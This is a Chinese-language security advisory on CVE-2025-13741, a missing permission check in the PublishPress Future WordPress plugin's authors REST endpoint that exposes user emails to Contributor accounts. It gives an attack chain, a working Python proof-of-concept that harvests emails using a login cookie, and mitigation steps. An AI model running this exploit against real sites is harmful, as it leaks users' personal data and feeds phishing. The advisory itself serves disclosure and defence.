CVE-2025-13741 | PublishPress Future WordPress插件越权访问漏洞

漏洞信息

漏洞编号

CVE-2025-13741

漏洞类型

越权访问

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Schedule Post Changes With PublishPress Future WordPress Plugin

漏洞概述

CVE-2025-13741是WordPress插件Schedule Post Changes With PublishPress Future中的一个越权访问漏洞。该插件用于管理WordPress文章的定时发布、取消发布、删除、状态更改等功能。漏洞根源在于getAuthors函数缺少权限检查，导致任何具有Contributor级别及以上权限的已认证用户都可以调用该API端点，获取所有具有edit_posts能力的用户邮箱地址等敏感信息。由于邮箱属于个人敏感数据，此漏洞可能导致用户隐私泄露，尤其在多用户博客或企业内部WordPress站点中影响更为严重。攻击者利用此漏洞可以收集大量用户邮箱，用于后续钓鱼攻击或社工攻击。CVSS评分4.3属于中等严重程度，主要因为需要认证且只影响机密性。

技术细节

该漏洞属于OWASP Top 10中的Broken Access Control（失效的访问控制）类别。在RestApiV1.php文件的getAuthors函数（第376行附近）中，开发者遗漏了current_user_can()或权限验证检查。正常情况下，WordPress REST API应该使用permission_callback参数验证当前用户权限，但该函数直接返回所有用户的邮箱信息。攻击者只需构造一个带有有效认证cookie的HTTP请求到相关REST API端点，即可绕过认证获取敏感数据。漏洞利用条件宽松：攻击者只需拥有Contributor角色（最低权限级别），即可在不需要任何用户交互的情况下发起攻击。由于该API端点没有实施速率限制，攻击者可以批量自动化获取用户数据。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress站点上的Contributor级别账户凭据（可通过暴力破解、钓鱼或利用其他漏洞获得）

STEP 2

步骤2

攻击者使用有效凭据登录WordPress，获取认证cookie

STEP 3

步骤3

攻击者构造恶意HTTP请求，访问/wp-json/post-expirator/v1/authors端点

STEP 4

步骤4

由于getAuthors函数缺少权限验证，服务端直接返回所有用户的邮箱和其他信息

STEP 5

步骤5

攻击者收集整理用户邮箱数据，用于后续钓鱼攻击、垃圾邮件发送或社工攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13741 PoC - PublishPress Future getAuthors IDOR
# Target: WordPress site with PublishPress Future plugin <= 4.9.2

def exploit(target_url, auth_cookie):
    """
    Exploit the missing capability check in getAuthors function.
    Requires Contributor+ level authentication.
    """
    endpoint = f"{target_url.rstrip('/')}/wp-json/post-expirator/v1/authors"
    
    headers = {
        "Cookie": auth_cookie,
        "Content-Type": "application/json"
    }
    
    print(f"[*] Targeting: {endpoint}")
    print(f"[*] Attempting to retrieve user emails...")
    
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            print(f"[+] Success! Retrieved {len(data)} user records")
            print("\n[+] User Emails:")
            for user in data:
                print(f"  - ID: {user.get('id')}, Email: {user.get('email')}, Name: {user.get('name')}")
            return data
        elif response.status_code == 401:
            print("[-] Authentication failed. Check your cookie.")
        elif response.status_code == 403:
            print("[-] Access denied. Insufficient permissions.")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    
    return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <auth_cookie>")
        print(f"Example: python {sys.argv[0]} http://victim.com 'wordpress_logged_in_xxx=yyy'")
        sys.exit(1)
    
    exploit(sys.argv[1], sys.argv[2])

影响范围

PublishPress Future < 4.9.3

Post Expirator <= 4.9.2

防御指南

临时缓解措施

如果无法立即更新插件，可以在Web应用防火墙（WAF）中添加规则，限制对/wp-json/post-expirator/v1/authors端点的访问，仅允许管理员IP访问。同时监控访问日志，排查是否有异常的大量API请求。对于多站点环境，考虑暂时禁用Post Expirator插件直到完成更新。